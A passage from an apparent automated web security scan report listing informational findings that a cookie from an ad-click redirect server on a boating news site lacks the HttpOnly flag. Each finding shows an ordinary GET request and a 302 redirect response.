P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.489. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:25:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.490. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:10:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.491. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:36:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.492. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.493. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.494. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.495. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:51:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.496. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.497. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:02:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.498. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.500. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.501. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:05:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.502. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:41:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

